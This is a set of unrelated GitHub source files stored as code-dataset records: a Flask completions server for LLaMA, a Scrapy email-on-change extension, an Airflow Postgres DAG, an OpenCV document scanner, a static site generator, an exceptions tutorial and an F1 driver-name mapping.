LLaMA\nimport click\n\n\nDEFAULT_HOST = '0.0.0.0'\nDEFAULT_PORT = 8000\nDEFAULT_LOG_LEVEL = 'INFO'\nDEFAULT_MAX_SEQ_LEN = 512\nDEFAULT_MAX_BATCH_SIZE = 32\nDEFAULT_MAX_TOKENS = 16\nDEFAULT_TEMPERATURE = 1.\nDEFAULT_TOP_P = 1.\nDEFAULT_NUM_RETURN_SEQUENCES = 1\nDEFAULT_PROMPT = 'Hello world!'\nFINISH_REASON_EOS = 'stop'\nFINISH_REASON_LENGTH = 'length'\nSYNC_INTERVAL = 0.2\nDEFAULT_SYNC_FILE = Path('sandle.lock')\n\nwith open('models.json') as f:\n MODELS = json.load(f)\n\n\ndef setup_model_parallel() -> Tuple[int, int]:\n local_rank = int(os.environ.get('LOCAL_RANK', -1))\n world_size = int(os.environ.get('WORLD_SIZE', -1))\n\n torch.distributed.init_process_group('nccl')\n initialize_model_parallel(world_size)\n torch.cuda.set_device(local_rank)\n\n # seed must be the same in all processes\n torch.manual_seed(1)\n return (local_rank, world_size)\n\n\ndef load(\n ckpt_dir: Path,\n tokenizer_path: Path,\n local_rank: int,\n world_size: int,\n max_seq_len: int,\n max_batch_size: int,\n) -> LLaMA:\n checkpoints = sorted(ckpt_dir.glob('*.pth'))\n if not checkpoints:\n raise Exception(f'Found no checkpoints under {ckpt_dir}')\n elif world_size != len(checkpoints):\n raise Exception(f'Started {world_size} processes but found {len(checkpoints)} (!= {world_size}) checkpoints')\n ckpt_path = checkpoints[local_rank]\n logging.info(f'Loading model from {ckpt_dir} (tokenizer: {tokenizer_path})')\n checkpoint = torch.load(str(ckpt_path), map_location='cpu')\n with open(ckpt_dir / 'params.json', mode='r') as f:\n params = 
json.loads(f.read())\n\n model_args = ModelArgs(max_seq_len=max_seq_len, max_batch_size=max_batch_size, **params)\n tokenizer = Tokenizer(model_path=str(tokenizer_path))\n model_args.vocab_size = tokenizer.n_words\n torch.set_default_tensor_type(torch.cuda.HalfTensor) # type: ignore\n model = Transformer(model_args)\n torch.set_default_tensor_type(torch.FloatTensor)\n model.load_state_dict(checkpoint, strict=False)\n\n return LLaMA(model, tokenizer)\n\n\ndef generate_response_id() -> str:\n return str(uuid4())\n\n\ndef get_timestamp() -> int:\n return int(time())\n\n\ndef truncate_at_stops(text: str, stop_strings: List[str]) -> Tuple[str, bool]:\n truncated = False\n for s in stop_strings:\n index = text.find(s)\n if index >= 0:\n text = text[:index]\n truncated = True\n return (text, truncated)\n\n\nclass Completion(NamedTuple):\n text: str\n finish_reason: Optional[str]\n idx: int\n\n @classmethod\n def from_truncation(cls, truncation: Tuple[str, bool], idx: int = 0):\n (text, truncated) = truncation\n return cls(text=text, finish_reason=FINISH_REASON_EOS if truncated else FINISH_REASON_LENGTH, idx=idx)\n\n\ndef make_api_completions(\n response_id: str, created: int, model_id: str, completions: List[Completion]\n) -> Dict[str, Any]:\n return {\n 'id': response_id,\n 'object': 'text_completion',\n 'created': created,\n 'model': model_id,\n 'choices': [\n {\n 'text': completion.text,\n 'index': completion.idx,\n 'logprobs': None,\n 'finish_reason': completion.finish_reason\n }\n for completion in completions\n ],\n 'usage': {'prompt_tokens': 0, 'completion_tokens': 0, 'total_tokens': 0},\n }\n\n\ndef make_error_response(status: int, message: str, error_type: str,\n param: Optional[Any] = None, code: Optional[str] = None) -> Response:\n return make_response((\n {\n 'error': {\n 'message': message,\n 'type': error_type,\n 'param': param,\n 'code': code,\n },\n },\n status,\n ))\n\n\nclass GenerateArgs(NamedTuple):\n args: Tuple[Any]\n kwargs: Dict[str, Any]\n\n\ndef create_app(model_id: str, generate_queue: Queue) -> Flask:\n app = Flask(__name__)\n\n @app.errorhandler(404)\n def invalid_url(error):\n return make_error_response(\n 404,\n f'Invalid URL ({request.method} {request.path})',\n 'invalid_request_error',\n )\n\n @app.errorhandler(405)\n def invalid_method(error):\n return make_error_response(\n 405,\n (\n f'Not allowed to {request.method} on {request.path} '\n '(HINT: Perhaps you meant to use a different HTTP method?)'\n ),\n 'invalid_request_error',\n )\n\n @app.errorhandler(500)\n def internal_server_error(error):\n return make_error_response(\n 500,\n 'The server encountered an internal error',\n 'internal_server_error',\n )\n\n @app.route('/v1/models')\n def get_models():\n return jsonify({\n 'data': [model_data for model_data in MODELS if model_data['id'] == model_id],\n 'object': 'list'\n })\n\n @app.route('/v1/completions', methods=['POST'])\n def post_completions():\n if not request.is_json:\n return make_error_response(\n 400,\n (\n 'Your request does not have a JSON Content-Type header. '\n 'The API expects \"Content-Type: application/json\".'\n ),\n 'invalid_request_error',\n )\n\n try:\n request_json = request.get_json()\n if not isinstance(request_json, dict):\n raise Exception('Request body is not a JSON dictionary')\n except Exception:\n return make_error_response(\n 400,\n (\n 'We could not parse the JSON body of your request. '\n '(HINT: This likely means you aren\\'t using your HTTP library correctly. 
'\n 'The API expects a JSON payload, but what was sent was not valid JSON.'\n ),\n 'invalid_request_error',\n )\n\n try:\n max_tokens = int(request_json.get('max_tokens', DEFAULT_MAX_TOKENS))\n\n requested_model_id = request_json['model']\n if requested_model_id != model_id:\n raise Exception(f'model must be {model_id}')\n\n prompt = request_json.get('prompt', DEFAULT_PROMPT)\n if not isinstance(prompt, str):\n raise Exception('prompt must be a string')\n\n _stop = request_json.get('stop')\n if isinstance(_stop, list):\n stops = _stop\n elif isinstance(_stop, str):\n stops = [_stop]\n else:\n stops = []\n\n if stops:\n logging.warning('Stop sequences are implemented naively')\n\n num_return_sequences = int(request_json.get('n', DEFAULT_NUM_RETURN_SEQUENCES))\n\n stream = request_json.get('stream', False)\n if stream:\n raise NotImplementedError('Streaming is not implemented')\n\n temperature = float(request_json.get('temperature', DEFAULT_TEMPERATURE))\n\n greedy_decoding = request_json.get('greedy_decoding', False)\n if greedy_decoding:\n temperature = 0\n\n top_p = float(request_json.get('top_p', DEFAULT_TOP_P))\n\n user = request_json.get('user')\n sentry_sdk.set_user({'id': user} if user else None)\n\n completion_log_text = 'completion' if num_return_sequences == 1 else 'completions'\n tokens_log_text = 'token' if max_tokens == 1 else 'tokens'\n if num_return_sequences != 1:\n tokens_log_text = tokens_log_text + ' each'\n logging.debug(f'Computing {completion_log_text} of up to {max_tokens} {tokens_log_text} for user {user}')\n\n except Exception as ex:\n return make_error_response(\n 400,\n str(ex),\n 'invalid_request_error',\n )\n\n # Ensure generate queue is empty before putting data in\n queue_empty = False\n while not queue_empty:\n try:\n generate_queue.get_nowait()\n except Empty:\n queue_empty = True\n\n response_id = generate_response_id()\n created = get_timestamp()\n prompts = [prompt] * num_return_sequences\n generate_queue.put(GenerateArgs(\n args=(prompts,),\n kwargs=dict(\n max_gen_len=max_tokens,\n temperature=temperature,\n top_p=top_p,\n ),\n ))\n api_completions = make_api_completions(\n response_id,\n created,\n model_id,\n [\n Completion.from_truncation(truncate_at_stops(raw_completion_text[len(prompt):], stop_strings=stops), i)\n for (i, raw_completion_text) in enumerate(generate_queue.get())\n ],\n )\n return jsonify(api_completions)\n\n return app\n\n\ndef serve_app(model_id: str, generate_queue: Queue, **waitress_kwargs):\n app = create_app(model_id, generate_queue)\n serve(app, **waitress_kwargs)\n\n\n@click.command()\n@click.argument('llama_dir', type=click.Path(exists=True, file_okay=False, path_type=Path))\n@click.argument('model_size', type=click.Choice(tuple(model_data['id'].split('-')[-1] for model_data in MODELS)))\n@click.option('--host', type=str, default=DEFAULT_HOST, help='Hostname or IP to serve on')\n@click.option('-p', '--port', type=int, default=DEFAULT_PORT, help='Port to serve on')\n@click.option('-l', '--log-level', type=click.Choice(('CRITICAL', 'ERROR', 'WARNING', 'INFO', 'DEBUG')),\n default=DEFAULT_LOG_LEVEL, help='Logging verbosity level threshold (to stderr)')\n@click.option('--max-seq-len', type=int, default=DEFAULT_MAX_SEQ_LEN, help='Maximum sequence length')\n@click.option('--max-batch-size', type=int, default=DEFAULT_MAX_BATCH_SIZE, help='Maximum batch size')\n@click.option('--sync-file', type=click.Path(dir_okay=False, file_okay=False, path_type=Path),\n default=DEFAULT_SYNC_FILE,\n help='File path to use for synchronizing 
processes/threads (must be unique; file must not exist)')\ndef main(\n llama_dir: Path,\n model_size: str,\n host: str = DEFAULT_HOST,\n port: int = DEFAULT_PORT,\n log_level: str = DEFAULT_LOG_LEVEL,\n max_seq_len: int = DEFAULT_MAX_SEQ_LEN,\n max_batch_size: int = DEFAULT_MAX_BATCH_SIZE,\n sync_file: Path = DEFAULT_SYNC_FILE,\n):\n \"\"\"\n Run a simplified, single-threaded clone of OpenAI's /v1/completions endpoint on the LLaMA model at\n LLAMA_DIR/MODEL_SIZE using the tokenizer at LLAMA_DIR/tokenizer.model .\n \"\"\"\n logging.basicConfig(format='[%(asctime)s] [%(levelname)s] [%(process)d] [%(name)s] %(message)s',\n level=log_level)\n\n sentry_sdk.init(\n integrations=[\n FlaskIntegration(),\n ],\n traces_sample_rate=0.1,\n )\n sentry_sdk.set_tag('component', 'backend-llama')\n\n model_id = f'llama-{model_size}'\n ckpt_dir = llama_dir / model_size\n tokenizer_path = llama_dir / 'tokenizer.model'\n\n (local_rank, world_size) = setup_model_parallel()\n logging.info(f'Local rank: {local_rank}')\n\n rank_0_generate_queue: Optional[Queue] = None\n rank_0_server_process: Optional[Process] = None\n if local_rank == 0:\n rank_0_generate_queue = Queue()\n rank_0_server_process = Process(\n target=serve_app,\n args=(model_id, rank_0_generate_queue),\n kwargs=dict(host=host, port=port, threads=1),\n )\n rank_0_server_process.start()\n\n generator = load(ckpt_dir, tokenizer_path, local_rank, world_size, max_seq_len, max_batch_size)\n\n try:\n # Ensure sync_file is created before any rank attempts to access it\n sync_file.touch()\n\n for loop_num in itertools.count(start=0):\n logging.debug(f'Starting loop {loop_num}')\n\n # Rank 0 gets new generate args from queue\n # We implement a crude file-based barrier to work around NCCL timeouts\n if rank_0_generate_queue is not None: # local_rank == 0\n generate_args_list = [rank_0_generate_queue.get()]\n sync_file.write_text(str(loop_num))\n else:\n generate_args_list = [None]\n while sync_file.read_text() != str(loop_num):\n sleep(SYNC_INTERVAL)\n\n # Rank 0 broadcasts args to other ranks\n torch.distributed.broadcast_object_list(generate_args_list, src=0, group=get_model_parallel_group())\n\n # All ranks process args\n [generate_args] = generate_args_list\n completed_prompts = generator.generate(*generate_args.args, **generate_args.kwargs)\n\n # Rank 0 puts completions onto queue\n if rank_0_generate_queue is not None: # local_rank == 0\n rank_0_generate_queue.put(completed_prompts)\n\n finally:\n if rank_0_generate_queue is not None and rank_0_server_process is not None: # local_rank == 0\n sync_file.unlink()\n rank_0_generate_queue.close()\n rank_0_server_process.join()\n\n\nif __name__ == '__main__':\n main(auto_envvar_prefix='SANDLE')\n","repo_name":"hltcoe/sandle","sub_path":"backend-llama/serve-backend-llama.py","file_name":"serve-backend-llama.py","file_ext":"py","file_size_in_byte":13857,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"16330881027","text":"import glob\nimport filecmp\nfrom scrapy import signals\nfrom scrapy.exceptions import NotConfigured\nfrom scrapy.mail import MailSender\n\nclass EmailOnChange(object):\n\n def __init__(self,destination, mailer):\n self.destination = destination\n self.mailer = mailer\n \n @classmethod\n def from_crawler(cls,crawler):\n if not crawler.settings.getbool(\"EMAIL_ON_CHANGE_ENABLED\"):\n raise NotConfigured\n if not crawler.settings.get(\"EMAIL_ON_CHANGE_DESTINATION\"):\n raise NotConfigured(\"EMAIL_ON_CHANGE_DESTINATION must be 
provided\")\n\n mailer = MailSender.from_settings(crawler.settings)\n destination = crawler.settings.get(\"EMAIL_ON_CHANGE_DESTINATION\")\n \n extension = cls(destination, mailer)\n\n crawler.signals.connect(extension.engine_stopped,signal=signals.engine_stopped)\n\n return extension\n\n def engine_stopped(self):\n #print(\"\\n\\n\\n EXTENSION WAS RUN \\n\\n\\n\")\n runs = sorted(glob.glob(\"/tmp/[0-9]*-[0-9]*-[0-9]*T[0-9]*-[0-9]*-[0-9]*.json\"), reverse=True)\n\n if len(runs) < 2:\n return\n current_file,previous_file = runs[0:2]\n\n if not filecmp.cmp(current_file,previous_file):\n print(\"\\n\\n\\n The files are different \\n\\n\\n\")\n with open (current_file) as f:\n self.mailer.send(\n to=[self.destination],\n subject=\"dataset changed\",\n body=\"changes in datasets detected, see attachment\",\n attachs=[(current_file.split('/')[-1], 'application/json',f)]\n )\n else:\n print(\"\\n\\n\\n no change \\n\\n\\n\")\n\n","repo_name":"dvpcloud/datacrawler","sub_path":"datachecker/extensions.py","file_name":"extensions.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25049512658","text":"from airflow import DAG\nfrom datetime import datetime\nfrom airflow.providers.postgres.operators.postgres import PostgresOperator\n\n\n\nwith DAG(dag_id='time_tracking', start_date=datetime(2022, 1, 1), \n schedule_interval='@daily', catchup=False) as dag:\n\n creating_table = PostgresOperator(\n task_id='creating_table',\n postgres_conn_id='postgres',\n sql='''\n CREATE TABLE IF NOT EXISTS myTime (\n curr_time TIMESTAMP\n );\n '''\n )\n \n inserting_values = PostgresOperator(\n task_id = 'inserting_values',\n postgres_conn_id='postgres',\n sql = '''\n INSERT INTO myTime VALUES (CURRENT_TIMESTAMP); \n '''\n )\n \n creating_table >> inserting_values","repo_name":"Sonali-Gudey/Docker-Kubernetes-Assignment","sub_path":"Docker_Assignment/dags/create_database_postgres.py","file_name":"create_database_postgres.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36828810215","text":"import numpy as np\nimport cv2\n\n# Document Scanner:\n# Draws contour around document.\n# Documents must be flat over a surface\n\n\ncap = cv2.VideoCapture(0)\n\nwhile(True):\n\tret, original = cap.read()\n\tgray = cv2.cvtColor(original,cv2.COLOR_BGR2GRAY)\n\t#gray = cv2.GaussianBlur(gray, (5, 5), 0)\n\t#_, thresh = cv2.threshold(gray,127,255,cv2.THRESH_BINARY+cv2.THRESH_OTSU)\n\tedged = cv2.Canny(gray, 100, 200)\n\t(_,cnts, _) = cv2.findContours(edged.copy(), cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\tcnts = sorted(cnts, key = cv2.contourArea, reverse = True)[:5]\n\t\n\t# loop over the contours\n\tfor c in cnts:\n\t\t# approximate the contour\n\t\tperi = cv2.arcLength(c, True)\n\t\tapprox = cv2.approxPolyDP(c, 0.02 * peri, True)\n\t \n\t\t# if our approximated contour has four points, then we\n\t\t# can assume that we have found our screen\n\t\tif len(approx) == 4:\n\t\t\tscreenCnt = approx\n\t\t\tbreak\n\t\n\tif screenCnt.any():\n\t\tcv2.drawContours(original, [screenCnt], -1, (0, 255, 0), 2)\n\tcv2.imshow('debug', edged)\n\tcv2.imshow('original', original)\n\tif cv2.waitKey(1) & 0xFF == 
ord('q'):\n\t\tbreak\n\n\n\ncap.release()\ncv2.destroyAllWindows()\n","repo_name":"jorgelopezrivas/opencv-learning","sub_path":"doc-scanner.py","file_name":"doc-scanner.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2931254036","text":"import os\r\nfrom tkinter import messagebox as mb\r\ndef renameing(file_path,file_name,new_file_name):\r\n chosenFile = f'{file_path}/{file_name}'\r\n path1 = os.path.dirname(chosenFile)\r\n extension = os.path.splitext(chosenFile)[1]\r\n newName = new_file_name\r\n path = os.path.join(path1, newName + extension)\r\n os.rename(chosenFile, path)\r\n mb.showinfo('confirmation', \"File Renamed !\")\r\n\r\n","repo_name":"RoHiT-engi/File_Manager","sub_path":"Rename_a_file.py","file_name":"Rename_a_file.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"7900273043","text":"\"\"\"TextBlock\n# Site Generator Script:\nCreated: ~0325hrs IST, 28th Oct 2023\n\nI started writing this script first as a standalone module, then thought about\nworking with it as a full-fledged Python module that I could build and maybe\neven package as a single unit. That led me nowhere, so I briefly considered\npursuing golang or rust to build this as a binary that I could just drop into\nthe dir containing my notes and have it generate a blog, but that made no \nsense either.\n\nFinally, I think I have a solution that makes sense. What I want to do is\nto embed content into Python files directly as ReStructured Text in \ndoctring-style string blocks, and then use these to form the bodies of the\ntext. I can then think about embedding the code between text content or \nsomething, or maybe making it so that I can set the strings as variables\nand reference them in some Python-compliant way that doesn't affect the code,\nbut makes sense in context of the text.\n\nWhy do this at all? I think there's some sense in making code more literate\nin some ways that don't have to do with the programming paradigms used to\ncompose the code in the first place. Also, working like this allows more\ndynamic use of Python's abilities to compose or alter the text, or to imbue\nvalues in the text at publishing time, or embed external content with better\nease. Also, I don't know right now if this will work. 
So, yeah.\n\nAnd this script should be able to fulfil that role, so I can maybe start\nactually writing and stop ruminating so much.\n\"\"\"\n\nimport json\nimport logging\nimport os\nimport re\nimport shutil\nimport signal\nimport sys\n\nfrom collections import defaultdict\nfrom docutils.core import publish_parts\nfrom markdown import markdown\nfrom pathlib import Path, PosixPath\nfrom rst2html5_ import HTML5Writer\nfrom typing import List, Dict, Tuple\n\nSUPPORTED_TYPES = {\".py\", \".rst\", \".md\", \".pdf\"}\nCURDIR_PATH = Path.cwd()\nEXEC_PATH = Path(__file__).parent.absolute()\nif CURDIR_PATH == EXEC_PATH:\n    OUTPUT_PATH = Path(os.path.join(CURDIR_PATH, \"output\"))\n    SOURCE_PATH = Path(os.path.join(CURDIR_PATH, \"source\"))\nelse:\n    OUTPUT_PATH, SOURCE_PATH = CURDIR_PATH, CURDIR_PATH\nBASE_TEMPLATE_PATH = Path(os.path.join(CURDIR_PATH, \"template/base.html\"))\nBASE_TEMPLATE_DEPENDENCIES = (\n    Path(os.path.join(CURDIR_PATH, \"template/style.css\")),\n    Path(os.path.join(CURDIR_PATH, \"template/scripts.js\")),\n    Path(os.path.join(CURDIR_PATH, \"template/8BITWONDERNominal.woff2\")),\n    Path(os.path.join(CURDIR_PATH, \"template/favicon.png\")),\n    Path(os.path.join(CURDIR_PATH, \"template/pattern-min.svg\")),\n)\n\nlogger = logging.getLogger(\"sitemake\")\nlogger.setLevel(logging.DEBUG)\nch = logging.StreamHandler()\nch.setLevel(logging.INFO)\n\nformatter = logging.Formatter(\"%(asctime)s - %(name)s - %(levelname)s - %(message)s\")\nch.setFormatter(formatter)\nlogger.addHandler(ch)\n\n\ndef parse_source_files(dir_path: str) -> Dict:\n    PathObj = Path(dir_path)\n    dir_list = []\n    file_list = []\n    paths_dir_map = defaultdict(list)\n\n    for item in PathObj.iterdir():\n        if item.name[0] == \".\":\n            continue\n        if item.is_dir():\n            dir_list.append(item)\n        elif item.is_file():\n            file_list.append(item)\n\n    # recursive traversal here to get all the paths and file items\n    for dir_item in dir_list:\n        subdir_paths_dir_map = parse_source_files(dir_item)\n        for k, v in subdir_paths_dir_map.items():\n            paths_dir_map[k].extend(v)\n    for file_item in file_list:\n        if not isinstance(file_item, PosixPath):\n            continue\n        if file_item.suffix.lower() in SUPPORTED_TYPES:\n            logger.debug(\"valid file: %s\", file_item.name)\n            dir_rel_path = str(file_item.parent.relative_to(CURDIR_PATH))\n            paths_dir_map[dir_rel_path].append(file_item.name)\n    logger.debug(paths_dir_map)\n    return paths_dir_map\n\n\ndef clear_output_directory(output_base_dir: Path):\n    dir_list = []\n    file_list = []\n    paths_dir_map = defaultdict(list)\n    for item in output_base_dir.iterdir():\n        if item.is_dir():\n            dir_list.append(item)\n        elif item.is_file():\n            file_list.append(item)\n\n    # recursive traversal here to get all the paths and file items\n    for dir_item in dir_list:\n        clear_output_directory(dir_item)\n        os.rmdir(dir_item)\n    for file_item in file_list:\n        if not isinstance(file_item, PosixPath):\n            raise Exception(\n                \"Could not delete file, Invalid filepath: {}\".format(str(file_item))\n            )\n        else:\n            os.remove(file_item)\n\n    logger.debug(paths_dir_map)\n    return\n\n\ndef handle_file_parse(inpath: Path, outpath: Path):\n    base_template_html = BASE_TEMPLATE_PATH.read_text()\n    if inpath.suffix != \".pdf\":\n        if inpath.suffix in (\".rst\", \".py\"):\n            html = publish_parts(writer=HTML5Writer(), source=inpath.read_text())[\n                \"body\"\n            ]\n        else:\n            parsed_doc = inpath.read_text()\n\n            parsed_text = []\n            for line in parsed_doc.split(\"\\n\"):\n                parsed_text.append(line.replace(\".md)\", \".html)\"))\n\n            html = markdown(\"\\n\".join(parsed_text))\n
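        # --- Editor's aside (added; not part of the original dataset record) ---
        # The line-by-line replace above rewrites intra-site Markdown links so
        # that 'page.md)' targets point at the generated 'page.html)' pages
        # before conversion. The bare str.replace also matches '.md)' inside
        # ordinary prose; a slightly stricter, regex-based sketch (assuming
        # standard [text](path.md) link syntax; re is already imported above):
        #
        #     parsed_doc = re.sub(r'(\]\([^)]*?)\.md\)', r'\1.html)', parsed_doc)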
outpath.write_text(base_template_html.format(body_content=html))\n else:\n outpath.write_bytes(inpath.read_bytes())\n pass\n\n\ndef generate_output_paths(output_base_dir, source_map: Dict[str, str]):\n if not output_base_dir.exists():\n os.makedirs(output_base_dir)\n for path in BASE_TEMPLATE_DEPENDENCIES:\n op_name = os.path.join(output_base_dir, path.name)\n shutil.copy(path, op_name)\n\n output_map = {}\n for dir, file_list in source_map.items():\n output_dir_path = Path(os.path.join(CURDIR_PATH, f\"output{dir[6:]}\"))\n if not output_dir_path.exists():\n os.makedirs(output_dir_path)\n\n for filename in file_list:\n source_file_path = \"/\".join(\n (\n dir,\n filename,\n )\n )\n source_file_path_abs = os.path.realpath(source_file_path)\n output_path_object = Path(os.path.join(output_dir_path, filename))\n output_path_object.touch()\n if Path(source_file_path_abs).suffix != \".pdf\":\n output_path_object = output_path_object.rename(\n output_path_object.with_suffix(\".html\")\n )\n handle_file_parse(Path(source_file_path_abs), output_path_object)\n output_map[str(output_path_object)] = source_file_path_abs\n return output_map\n\n\n# TODO: first create directories, then generate nav, then populate files, and finally use\n# nav to verify that all files have been created\ndef generate_nav(output_base_dir, output_map: dict = {}) -> List:\n nav_map = defaultdict(Dict)\n nav_abspath = lambda x: f\"Index/{os.path.relpath(x, output_base_dir)}\"\n nav_list = [nav_abspath(k) for k in output_map.keys()]\n return nav_list\n\n\ndef parse_dir_paths(project_path):\n # static site component stuff will go here\n paths_dir_map = parse_source_files(project_path)\n logger.info(json.dumps(paths_dir_map, indent=4))\n\n project_path_obj = Path(project_path)\n output_dir = Path(os.path.join(OUTPUT_PATH, project_path_obj.name))\n return paths_dir_map, output_dir\n\n\ndef confirm_source_path(possible_paths: tuple) -> int:\n while True:\n print(\"Choose a project by num:\")\n input_args = \"\\n\".join(\n [\" \".join((f\"{i[0] + 1}. \", i[1])) for i in enumerate(possible_paths)],\n )\n check_path = input(f\"{input_args} \\nProject num ->: \")\n if check_path.isnumeric() and 0 < int(check_path) <= len(possible_paths):\n return possible_paths[int(check_path) - 1]\n else:\n print(\"Invalid input.\")\n continue\n\n\ndef setup_output():\n print(f\"Current path: {str(CURDIR_PATH)}\")\n print(f\"Sitemake path: {str(EXEC_PATH)}\")\n if not OUTPUT_PATH.exists():\n print(\"OUTPUT dir does not exist. Creating...\")\n OUTPUT_PATH.mkdir()\n print(f\"OUTPUT path: {str(OUTPUT_PATH)}\")\n if not SOURCE_PATH.exists():\n print(\"TARGET dir does not exist. 
Creating...\")\n SOURCE_PATH.mkdir()\n print(f\"TARGET path: {str(SOURCE_PATH)}\")\n\n print(\"Checking source path contents...\")\n source_list = tuple(str(i) for i in SOURCE_PATH.iterdir() if i.is_dir())\n source_path = confirm_source_path(source_list)\n return source_path\n\n\ndef main():\n source_project = setup_output()\n source_paths, output_base_dir = parse_dir_paths(source_project)\n if output_base_dir.exists():\n clear_output_directory(output_base_dir)\n os.rmdir(output_base_dir)\n output_paths = generate_output_paths(output_base_dir, source_paths)\n nav = generate_nav(output_base_dir, output_paths)\n logger.info(json.dumps(nav, indent=4))\n\n\ndef handle_signal(sig, frame):\n print(\"\\nHandled SIGINT\\nExiting now...\")\n sys.exit(0)\n\n\nsignal.signal(signal.SIGINT, handle_signal)\n\n\nif __name__ == \"__main__\":\n print(\"Print Ctrl+C to exit\")\n main()\n","repo_name":"essnine/script-post-self","sub_path":"sitemake.py","file_name":"sitemake.py","file_ext":"py","file_size_in_byte":9097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18525073743","text":"# errors and exception\n# program returns errors or exception due to exception or syntax error \n\n#a = 5 print(5) # syntax error\n#a = 5 \n#print(a)) # syntax error\n#a = 5 + '10' # type error\n# import somemodule # module not found error \n# f = open('filenotfound.txt') # file not found error \n\na = [1,2,3]\n#a[4] # index error\n\ndict = {\"name\":\"alice\"}\n# dict['age'] # key error\n\n# raise exception\nx = -1 \n# if x < 0:\n# raise Exception('x should be positive') #Exception: x should be positive\n\n# assert(x>=0), 'x should >= 0' # return True if match ,AssertionError\n\n# catch exception \ntry:\n a = 5/0\n# except Exception as e:\n # print('error divide by 0')\n # print(e)\nexcept ZeroDivisionError as e :\n print(e)\nexcept TypeError as e:\n print(e)\nelse: \n print(\"no exception\")\nfinally: \n print(\"cleaning up...\") # always run \n\nclass ValueTooHighError(Exception):\n pass \n\nclass ValueTooSmallError(Exception):\n def __init__(self, message, value):\n self.message = message \n self.value = value \n\ndef test_value(x):\n if x >100 :\n raise ValueTooHighError('value is too high')\n if x < 5:\n raise ValueTooSmallError('value too small', x)\ntry:\n test_value(200)\nexcept ValueTooHighError as e:\n print(e)\nexcept ValueTooSmallError as e:\n print(e.message, e.value)\n\n","repo_name":"feimvnc/ml-python","sub_path":"python-programming/exceptions/exceptions.py","file_name":"exceptions.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"13724696013","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Jan 08 13:37:39 2017\r\n\r\n@author: Stergios\r\n\"\"\"\r\n\r\nreplace_characters = {u'ó' : 'o',\r\n u'ã' : 'a',\r\n u'ü' : 'u',\r\n u'í' : 'i',\r\n u'é' : 'e'}\r\n\r\ndriver_mapping = {'hamilton' : 'Lewis Hamilton',\r\n 'heidfeld' : 'Nick Heidfeld',\r\n 'rosberg' : 'Nico Rosberg',\r\n 'alonso' : 'Fernando Alonso',\r\n 'kovalainen' : 'Heikki Kovalainen',\r\n 'nakajima' : 'Kazuki Nakajima',\r\n 'bourdais' : 'Sebastien Bourdais',\r\n 'raikkonen' : 'Kimi Raikkonen',\r\n 'kubica' : 'Robert Kubica',\r\n 'glock' : 'Timo Glock',\r\n 'sato' : 'Takuma Sato',\r\n 'piquet_jr' : 'Nelson Piquet Jr.',\r\n 'massa' : 'Felipe Massa',\r\n 'coulthard' : 'David Coulthard',\r\n 'trulli' : 'Jarno Trulli',\r\n 'sutil' : 'Adrian Sutil',\r\n 'webber' : 'Mark Webber',\r\n 
'button' : 'Jenson Button',\r\n 'davidson' : 'Anthony Davidson',\r\n 'vettel' : 'Sebastian Vettel',\r\n 'fisichella' : 'Giancarlo Fisichella',\r\n 'barrichello' : 'Rubens Barrichello',\r\n 'ralf_schumacher' : 'Ralf Schumacher',\r\n 'liuzzi' : 'Vitantonio Liuzzi',\r\n 'wurz' : 'Alexander Wurz',\r\n 'speed' : 'Scott Speed',\r\n 'albers' : 'Christijan Albers',\r\n 'markus_winkelhock' : 'Markus Winkelhock',\r\n 'yamamoto' : 'Sakon Yamamoto',\r\n 'michael_schumacher' : 'Michael Schumacher',\r\n 'montoya' : 'Juan Pablo Montoya',\r\n 'klien' : 'Christian Klien',\r\n 'monteiro' : 'Tiago Monteiro',\r\n 'ide' : 'Yuji Ide',\r\n 'villeneuve' : 'Jacques Villeneuve',\r\n 'montagny' : 'Franck Montagny',\r\n 'rosa' : 'Pedro de la Rosa',\r\n 'doornbos' : 'Robert Doornbos',\r\n 'karthikeyan' : 'Narain Karthikeyan',\r\n 'friesacher' : 'Patrick Friesacher',\r\n 'zonta' : 'Ricardo Zonta',\r\n 'pizzonia' : 'Antonio Pizzonia',\r\n 'matta' : 'Cristiano da Matta',\r\n 'panis' : 'Olivier Panis',\r\n 'pantano' : 'Giorgio Pantano',\r\n 'bruni' : 'Gianmaria Bruni',\r\n 'baumgartner' : 'Zsolt Baumgartner',\r\n 'gene' : 'Marc Gene',\r\n 'frentzen' : 'Heinz-Harald Frentzen',\r\n 'verstappen' : 'Jos Verstappen',\r\n 'wilson' : 'Justin Wilson',\r\n 'firman' : 'Ralph Firman',\r\n 'kiesa' : 'Nicolas Kiesa',\r\n 'burti' : 'Luciano Burti',\r\n 'alesi' : 'Jean Alesi',\r\n 'irvine' : 'Eddie Irvine',\r\n 'hakkinen' : 'Mika Hakkinen',\r\n 'marques' : 'Tarso Marques',\r\n 'bernoldi' : 'Enrique Bernoldi',\r\n 'mazzacane' : 'Gaston Mazzacane',\r\n 'enge' : 'Tomas Enge',\r\n 'yoong' : 'Alex Yoong',\r\n 'salo' : 'Mika Salo',\r\n 'diniz' : 'Pedro Diniz',\r\n 'herbert' : 'Johnny Herbert',\r\n 'mcnish' : 'Allan McNish',\r\n 'buemi' : 'Sebastien Buemi',\r\n 'takagi' : 'Toranosuke Takagi',\r\n 'badoer' : 'Luca Badoer',\r\n 'zanardi' : 'Alessandro Zanardi',\r\n 'damon_hill' : 'Damon Hill',\r\n 'sarrazin' : 'Stephane Sarrazin',\r\n 'rosset' : 'Ricardo Rosset',\r\n 'tuero' : 'Esteban Tuero',\r\n 'nakano' : 'Shinji Nakano',\r\n 'magnussen' : 'Jan Magnussen',\r\n 'berger' : 